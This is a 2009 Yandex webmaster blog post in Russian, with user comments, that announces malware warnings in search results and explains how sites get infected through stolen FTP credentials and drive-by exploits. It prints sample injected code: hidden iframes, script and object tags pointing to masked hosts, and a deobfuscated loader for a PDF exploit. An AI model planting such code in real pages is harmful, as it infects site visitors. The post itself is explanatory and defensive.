Блог Яндекса для вебмастеров

Безопасный поиск от Яндекса

26 мая 2009, 10:45

Вы думаете заразиться сложно? Для этого достаточно зайти на веб-страницу с вредоносным кодом и...


Последние несколько лет вирусы чаще всего распространяются именно через веб-сайты. Яндекс хочет защитить своих пользователей от растущей вирусной угрозы и теперь помечает опасные сайты в результатах поиска.
 

Информация к размышлению
 
По данным компании Sophos ®, в 2008 году каждые 4,5 секунды обнаруживалась зараженная веб-страница, каждый день создавалось несколько сайтов, распространяющих фальшивые антивирусы. С ростом популярности социальных сетей количество электронных сообщений с вредоносными вложениями увеличилось в 5 раз. Сейчас каждый месяц обнаруживается несколько новых модификаций вируса подмены страниц. При этом каждый десятый сайт, распространяющий вредоносное ПО, хостится в России. Очевидно, при таких темпах распространения угрозы безопасность пользователей поиска скоро станет базовой функциональностью поисковых систем. Антивирусные компании прогнозируют продолжение бурного роста количества сайтов с вредоносным кодом.

По данным Яндекса, еженедельно пользователи совершали более 2 миллионов переходов из результатов поиска на сайты, содержащие страницы с вредоносным кодом.


Как получают доступ к сайту
 
Часто вредоносными становятся обычные сайты, веб-мастера которых не уделили достаточного внимания вопросам информационной безопасности.  Для сайтов с высокой посещаемостью злоумышленники могут выполнять целенаправленный анализ и поиск уязвимостей с целью обойти защиту и получить возможность изменить содержимое. Иногда их целью становятся баннерные сети или счетчики. Взлом подобных систем позволяет автоматически распространить вредоносный код по всем страницам с этими баннерами или счетчиками.

 

Есть и другие схемы заражения страниц, самые распространенные из которых в общих чертах описаны ниже.

Очень часто для администрирования (обновления, добавления, удаления страниц и изображений) используется FTP-доступ к серверу, на котором расположен веб-сайт. Злоумышленники занимаются подбором паролей или кражей учетных записей FTP на зараженных компьютерах веб-мастеров. Для подбора паролей специальная программа обходит серверы в интернете и пытается соединиться по протоколу FTP, указывая наиболее типичные логины и пароли из "словаря" часто используемых или перебирая варианты. До сих пор веб-мастера используют "слабые" пароли и такой метод все еще позволяет собирать учетные записи.
 
Также учетные записи могут быть украдены трояном, заразившим компьютер веб-мастера. Троян знает, где популярные программы сохраняют логины и пароли для доступа и считывает конфигурационные файлы или записи реестра и отправляет их на сервер злоумышленников. Кроме этого, он может "прихватить" пароли ICQ и социальных сетей, другие конфиденциальные данные. Злоумышленники, старающиеся распространить зловредный код, могут как собирать базу паролей самостоятельно, так и покупать данные для доступа к сайту на черном рынке.
 
Как происходит заражение сайта
 
Специальная программа заходит на каждый сервер из базы с помощью похищенного логина и пароля. Там она ищет файлы стандартные для большинства веб-сайтов, например, 'index.php', 'index.asp', 'index.html' и т.д., и меняет их содержимое так, чтобы отображение такой страницы на пользовательском компьютере могло вызвать его заражение.
 
Так как списки для FTP доступа могут многократно перепродаваться на закрытых форумах, заражение одних и тех же сайтов может  происходить разными вирусами и не один раз.


Как выглядит вредоносный код
 
Примеры. Вредоносный код может добавлять к страницам такие конструкции:
 

<iframe src="http: //****-*******.net/?click=12078406" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>


или
 

<script src=http: //www.****.ru/script.js></script>


или такой
 

<object  data='http: //***.name/in.cgi?2 ' type='text/html'  style='display:none'></object>

 
А баннерная система для взрослых может использовать такой код:
 

<script language="javascript">
var xxxwidth= 300;
var xxxheight= 100;
var xxxbgcolor= '';
var xxxcolor= 'blue';
var xxxsize= 16;
var xxxcount= 5;
</script>
<script language="javascript" src="http: //*****-*****.ru/load.php?id=330"></script>

 
Маскировка вредоносного кода
 
Часто авторы кода стараются затруднить его анализ и обнаружение, используя специальные техники, называемые обфускацией (от англ. obfuscation). Это может выглядеть так:




Заражение компьютера пользователя
 
Почему происходит заражение? Казалось бы, страница просто загружается браузером и отображается. Если бы в программах не было ошибок, то загрузка и отображение были бы всегда безопасными действиями. К сожалению, такие ошибки (уязвимости) есть, они и используются злоумышленниками. Хотя компании регулярно выпускают обновления для своих продуктов, злоумышленники постоянно исследуют их в поиске новых уязвимостей.
 
Вредоносный код на загружаемой пользователем странице, выполняясь, использует уязвимости приложений, что позволяет злоумышленникам получить полный контроль над атакуемым компьютером. Специально написанная для этого программа или скрипт называется эксплойт (от англ. exploit). Эксплойты для разных типов уязвимостей объединяют в наборы (exploit packs) для повышения вероятности заражения компьютера жертвы. Для атаки используются уязвимости как в самом браузере, так и в других приложениях и дополнениях (например, в плагинах для просмотра PDF и flash).


Как на этом зарабатывают
 
Очень часто код, внедренный в страницу сайта, перенаправляет пользователя на эксплойт или рекламный сайт не напрямую, а через специальный сервер злоумышленников, который называют Traffic Distribution System (TDS). Задача этой системы -- "перебрасывать" пользователей дальше и собирать статистику в зависимости от характеристик атакуемого компьютера. Например, TDS может анализировать версию используемого браузера и направлять пользователя на систему с вредоносным кодом, где есть эксплойт для его версии.

Если код эксплойта получил контроль над компьютером пользователя, то он выполняет загрузку и исполнение основной части вируса. Эта часть остается активной на компьютере жертвы и может выполнять множество вредоносных действий. Например, собирать имена и пароли для FTP и других установленных программ и отправлять их злоумышленникам. Или же использовать их для дальнейшего заражения сайтов. Или показывать пользователю рекламу, подменять результаты поисковых систем. Следить за действиями пользователя и "коллекционировать" учетные записи для популярных сайтов или online-банков. Часто различные зловредные модули могут объединяться, а компьютер включаться в сеть из инфицированных систем (бот-сеть), контролируемых злоумышленниками. Крупнейшие ботнеты в мире насчитывают  миллионы "зомбированных" компьютеров. Продажа услуг такой сети -- еще одна статья дохода злоумышленников. Бот-сеть может использоваться для рассылки спама или организации DDoS-атак.

Пример
 
Рассмотрим код, который можно встретить в зараженной баннерной системе или на popunder-баннере. Казалось бы, "безобидный" код
 

<script language="javascript" src="http: //*****-*****.ru/load.php?id=330"></script>


кроме показа баннера вставляет на страницу и такой код
 

<iframe src="http: //************.com/tds/in.cgi?13" frameborder=0 width=0 height=0></iframe>


Если открыть эту страницу в Firefox 3.0.10, то после выполнения кода баннерной системы браузер пользователя автоматически перейдет по ссылке, указанной в IFRAME, а ссылка приведет на TDS злоумышленников. В ответ от TDS браузер получает автоматическое перенаправление на следующий сайт, где расположен эксплойт, учитывающий версию браузера. Он рассчитан на уязвимость в Adobe Acrobat Reader и приводится в действие обфусцированным кодом, который в расшифрованном виде выглядит так:
 

function pdf() { var my_div = document.createElement("div"); my_div.innerHTML = "<object data=\"http: //****.org/spl/pdf.php\" type=\"application/pdf\" width=100 height=100></object>"; document.body.appendChild(my_div); } pdf();

 
Послесловие
 
Задачи по борьбе с вирусами появились в Яндексе около года назад. Мы надеемся, что наш поиск, став более безопасным, снизит темпы распространения вредоносных программ в Рунете.
 

Группа пролетарского гнева компании Яндекс

52 комментария
Интересно, Sophos им хоть бабла отстегнул за пеар? :) Или наоборот еще и взял с них...
взял, конечно
Ну вообще одно другого не исключает, с конторы мог взять, людЯм отстегнуть. :) Самое логичное с учетом того что покупать там нечего, а ифреймы на сайтах подозрительные определять - программер любой толковый за день напишет.
ну это слишком просто, тем более во фреймах не только $вара, тут опытные специ нужны... думаю, в яндексе и на локальных серверах sophos
Здорово! Дай Бог, чтобы это вышло

"Специальная программа осуществляет заходит на каждый сервер..."

"Осуществляет заходит" - что-то новенькое!

Поправили, спасибо.
Долго изобретали "велосипед", гугл на нем уже давно катается.
Это точно :) Только у Гугла алгоритмы правильно заточены. Впрочем, как и во всем
Пугали-пугали, но так и не сказали, ЧТО делает Яндекс? Еле сообразил заглянуть по ссылке. Но так и не понял, что подразумевается под
При этом Яндекс не закрывает доступ к ресурсу, а только сообщает о возможных последствиях.
- только малозаметная пометка рядом с результатом или переход на страничку с крупными буквами "Опасно!" и маленькой кнопочкой "Я всё равно хочу на тот ресурс"?
А вы пробовали хотя бы на этот опасный результат ткнуть, а?
Я похож на идиота?
А вы не догадываетесь?
Конечно, похож :) но все же - вначале напугали этими страшными сайтами, а теперь предлагаете перейти по ссылке ;) Сказали бы сразу, что при попытке перейти на результат поиска пользователь получает четкое и внятное предупреждение, тогда бы я не задавал здесь глупых вопросов ;)
Сами же пугаете ужасами ;)
Вот вам пример запроса: [datacord]
Как выглядит результат - в примере чуть выше.
Потыкал. удобно, но слишком незаметно. Не привлекает внимания... И очень не хватает переключалки "убрать из результатов поиска вредоносные сайты" Т.е. чтобы пользователь по своему желанию мог их убрать из данного результата.
Яндекс как хорошая поисковая система должна находить все сайты (кроме тех, которые нарушаю поисковую лицензию, разумеется). Если сайт содержит вредоносный код, мы предупреждаем об этом. Кроме того, если пользователь не найдет в Яндексе какой-то зараженный сайт, он может перейти на него по ссылке с других ресурсов, где предупреждения об опасности нет, и подхватить вирус.
Попробую более внятно объяснить мысль. Вот предположим, сделал человек запрос, по которому, к примеру, на первых пяти страницах результатов поиска основную массу составляют "вредоносные" сайты. Человеку приходится высматривать среди "мусора" полезное ему. А если бы он мог нажать на ссылочку и получить отфильтрованнный результат? Но получать его только тогда, когда он сам нажимает на эту ссылочку? Что же до Вашей последней фразы, то я удивлен. Неужели вы еще не встроили в Яндекс-бар защиту, которая при попытке зайти на вредный сайт вывешивает страничку-предупреждение? Или такое в принципе невозможно?
Вероятность того, что на первых пяти страницах результатов поиска по запросу основную массу составляют "вредоносные" сайты, крайне мала, поэтому мы пока что не видим необходимости в такой функциональности.
Яндекс.Бар пока что не предупреждает о вредоносных сайтах, но мы думаем в этом направлении.
Вот бы еще как-то админу писалось, где конкретно нашлось. А то пометка появляется в поиске, а найти причину как-то вообще не получается. Даже странно как-то? На мысли навевает? Может только Софос сможет ответить? Но за деньги?
Информация о примерах зараженных страниц доступна в Яндекс.Вебмастере для зарегистрированных пользователей.
Добрый день!

Крайне полезная опция поисковой системы!

Только работает пока неоптимально. Так, на курируемом мной портале вирус появился 17 сентября  2009 г. и был убран в этот же день. Вируса на сайте нет с 17 сентября по сей день. НО: ЧЕРЕЗ 2 НЕДЕЛИ в резельтатах поиска Яндекса появились сообщения, что сайт "представляет угрозу". Зарегистрировались в webmaster.yandex.ru, отправили запрос на пересмотр сайта, получили ответ, что через несколько дней сайт будет пересмотрен, и уже почти неделю нет никаких изменений. А вируса на сайте нет. Как написано в инструкции, отправление запроса через форму webmaster.yandex.ru предусматривает ручную проверку. Однако, по-видимому, это не так.
Ваше мнение по этому поводу?
Ирина.
Добрый день. Укажите, пожалуйста, адрес портала. Можно здесь, можно по адресу grprgn@ya.ru. Спасибо.
Спасибо за ответ. На указанный адрес отправлено письмо с адресом портала. На всякий случай указываю его и в форуме. Это www.rsci.ru
web вирусы  - познавательно от Яндекса
Спасибо!
Удалённый пользователь
27 мая 2009, 06:06
Мы же ВАМ доверяем ........

Забавно, что Ваш дата-центр охраняет ЧОП "Троян":)

Присоединяюсь, у меня уже есть опыт по лечению сайтов, своих друзей и клиентов от вирусов.

Только как помочь Яндексу в борьбе с вирусом?
А если в поставить код popunder, нормально все будет? =)
А что, сразу функционал у Google слизать не удалось? Только через пару лет Яндекс с горем пополам смог реализовать аналогичное?

Для информации (и тех, кто не знает) - изначально идея безопасного поиска была реализована у Google, пару лет назад уже. И до сих пор работает.
Радует.

А такая же предупреждалка о фишинге будет?
Мы думаем в этом направлении.
Мой блог оказался зараженным www.readmymind.ru. С главной страницы перенаправляет пользователей на ГС на ucoz. Я так и не смог найти вредоносный код. Ситуацию описал в одной из последних записей на блоге.

Может мне Яндекс помочь?
Вам необходимо зарегистрироваться Яндекс.Вебмастере и подтвердить там права на сайт. После этого вам станет доступна информация о зараженных страницах. Кроме того, обратите внимание на наш вчерашний пост.
Читал я это, и в панели веб-мастера зарегистрирован - там нет информации о зараженных страницах и вредоносный код найти не получается (
Возможно, что кто-то эмулирует клик пользователя на упомянутый сайт, чтобы привлечь внимание. Вы ведь можете, вопрошая, в своем блоге и ссылку на этот сайт поставить и обязательно на этот сайт зайдете, а там можно вам рекламу показать или перенаправить еще куда-нибудь.
приписали к моему сайту такое.. мы все проверили многократно, ну нет "вредоносных кодов" ни в скриптах, ни в шаблонах, ни в .htaccess.. посещаемость упала, а доказательств со стороны Яндекса никаких нет..только приписка что точность данных не гарантируем и отвественности не несем.. вот что делать в таком случае??? в этот Sophos уже написал, пусть разбираются..
причем Google не показывает сайт как зараженный, онлайн антивирусы тоже, скрипты скачал проверил NOD 32 - всё чисто.. ппц полный..
Для того, чтобы ваш случай был рассмотрен как можно скорее, следует обращаться в нашу службу поддержки, предварительно зарегистрировавшись в Яндекс.Вебмастере.
да уже прислали письмо с примером вредоносоного кода.. такое действительно было, видно угнали фтп, но в начале апреля, а уже середина июня, прошло более 2 месяцев.. а Вы нас до сих пор мурыжите зачем-то, хотя кода нет на страницах уже 2 месяца.. и причем это оповещение появилось через 2 месяца, а не когда код реально был на сайте, так зачем оно надо? от чего вы защищаете? в момент опасности оповещения не было, а появилось уже на чистом сайте.. в чем смысл???????? надо же реально информировать своих пользователей, вы бы еще год прождали..
К сожалению, ваш сайт все еще представляет потенциальную опасность для пользователей, переходящих на него с поисковых систем. Вредоносный код запускается только при переходе с результатов поиска (посмотрите исходный код страницы). А если вы вводите адрес своего сайта в адресной строке браузера, ничего необычного не происходит. Пожалуйста, просмотрите еще раз исходный код cms вашего сайта. Посмотрите также, что происходит при переходе на tele4n.ru с выдачи Яндекса:
спасибо за помощь!!!!!!!!!
наконец-то кто-то нормально ответил!!!!!!!!!
нашли этого гада в файле engine/data/dbconfig.php и удалили!!!!!!!
Сильно! Пригодится. Тем более, что один раз увидеть лучше...
ДАВНО ПОРА! а гугл впереди планеты всей...
я заразил все свои сайты на хостинге установив для пробы попундер! Устанавливал, проверил что за система и удалял, на следующий день захожу на свой сайт и нод32 показывает что сайт заражен какой то троянской программой js

Захожу на второй сайт на этом хостинге с одним ftp акоунтом и вижу такую же ситуацию.

Сразу понял что попундер крисятничал! хотя известная контора попундер

Найден еще один сайт, выдающий окно "Ваш компьютер заблокирован", предлагающий разблокировать его по телефону.

unitefilms.com

Полезная вещь!

Сделал на своем dofollow блоге

Верится но с трудом что это будет работать 

Очень познавательно! Спасибо!:-)[:]||||[:]